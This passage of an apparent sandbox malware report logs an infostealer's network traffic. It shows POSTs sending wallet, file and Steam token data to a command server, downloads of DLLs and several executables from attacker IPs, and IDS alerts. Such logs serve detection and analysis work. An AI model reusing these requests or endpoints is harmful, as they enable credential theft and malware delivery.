name="message"plugins------GIEBAECAKKFCBFIEGCBK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"fplugins------BKFBAKFCBFHIJJJJDBFC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.115Content-Length: 5907Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJHost: 185.215.113.115Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAEHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 2d 2d 0d 0a Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="file"------FHIDBKFCAAEBFIDHDBAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJDHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="file"------GDHIIIIEHCFIECAKFHJD--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJHost: 185.215.113.115Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIEHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="message"wallets------ECGDBFCBKFIDHIDHDHIE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 185.215.113.115Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"files------DBKEHDGDGHCBGCAKFIII--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="file"------AAKKKEBFCGDBGDGCFHCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="message"ybncbhylepme------DBKEHDGDGHCBGCAKFIII--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJHost: 185.215.113.115Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDBAKEGIDBGIEBFHDHJJ--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 33 32 41 37 34 42 36 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB32A74B65D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/7914816047/KQlljCB.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 30 34 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1080446001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5154942679/GWZ8arC.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 30 34 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1080451001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/8029815729/28qbTrm.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 30 35 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1080541001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6960404221/w3Xwk4R.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 30 35 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1080595001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/405291215/0LGvvQO.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 31 33 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1081341001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5265591378/spoDnGT.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 31 37 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1081729001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/748049926/kzTq7Bt.exe HTTP/1.1Host: 185.215.113.75

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.75 185.215.113.75

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: DINET-ASRU DINET-ASRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49768 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49745 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49917 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49948 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49969 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49963 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49978 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49980 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50023 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50029 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50019 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50062 -> 172.67.209.219:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50070 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50073 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50076 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50078 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50079 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50081 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50083 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50082 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50080 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50085 -> 104.21.23.62:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50086 -> 104.21.23.62:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
